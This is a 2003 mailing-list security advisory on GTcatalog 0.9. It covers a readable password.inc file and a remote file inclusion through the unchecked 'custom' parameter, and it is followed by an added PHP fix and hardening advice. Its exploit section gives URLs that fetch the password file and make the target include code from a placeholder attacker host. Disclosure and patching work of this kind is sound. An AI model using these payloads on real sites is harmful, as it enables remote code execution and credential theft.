Information :
°°°°°°°°°°°°°
Version : 0.9
Website : http://www.geektweaked.com
Problem :
- Information Disclosure (Admin Password)
- File Inclusion

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
password.inc :

<? $globalpw = "[PASSWORD]"; ?>

index.php :
------------------------------------------------------------------------
[...]
switch ($function) {
case "custom":
    $cc = new Template();
    $cc->set_file("head",$dir_base.$dir_template."header.inc");
    $cc->set_var(array(
        'clientcode' => $cfg_clientcode,
        'title' => $cfg_title." - ".$custom));
    $cc->parse("output","head");
    $cc->p("output");
    // $custom is taken from the request and used unchecked in the include path
    include($custom.".custom.inc");
    include ($dir_base.$dir_template."footer.inc");
    break;
[...]
------------------------------------------------------------------------

Exploits :
°°°°°°°°°°
- http://[target]/password.inc
- http://[target]/index.php?function=custom&custom=http://[attacker]/1
  with : http://[attacker]/1.custom.inc

Patch :
°°°°°°°
A patch can be found on http://www.phpsecure.info (-> New Version !! :))

More Details :
°°°°°°°°°°°°°°
In French : http://www.frog-man.org/tutos/GTcatalog.txt

frog-m@n
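One way to constrain the include shown in index.php, given as an added example: it is not the patch referenced in the advisory and not the project's own code. The function name resolve_custom_page() and the custom/ directory are assumptions made for illustration.

```php
<?php
// Added example: validate the "custom" page name before including it.
// resolve_custom_page() and the custom/ directory layout are hypothetical.

function resolve_custom_page($name, $customDir)
{
    // Accept only a short identifier: no URL scheme, slash, dot or NUL byte,
    // so neither a remote URL nor a ../ traversal can reach the include.
    if (!is_string($name) || !preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)) {
        return null;
    }

    $base = realpath($customDir);
    if ($base === false) {
        return null;
    }

    // Build the path from a fixed local directory, then confirm the resolved
    // file really lives inside that directory (this also covers symlinks).
    $path = realpath($base . DIRECTORY_SEPARATOR . $name . '.custom.inc');
    if ($path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0
        || !is_file($path)) {
        return null;
    }
    return $path;
}

// Read the parameter explicitly instead of relying on register_globals.
$custom = isset($_GET['custom']) ? $_GET['custom'] : '';
$page = resolve_custom_page($custom, __DIR__ . '/custom');

if ($page === null) {
    header('HTTP/1.1 404 Not Found');
    exit('Unknown page');
}
include $page;
```

The password.inc disclosure is a separate issue: a web server normally returns .inc files as plain text, so such a file has to be kept outside the document root or denied in the server configuration. Disabling allow_url_fopen (and allow_url_include on PHP 5.2 and later) removes the remote-URL case even where an include path is not validated.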
This archive was generated by hypermail 2b30 : Mon Mar 03 2003 - 09:04:57 PST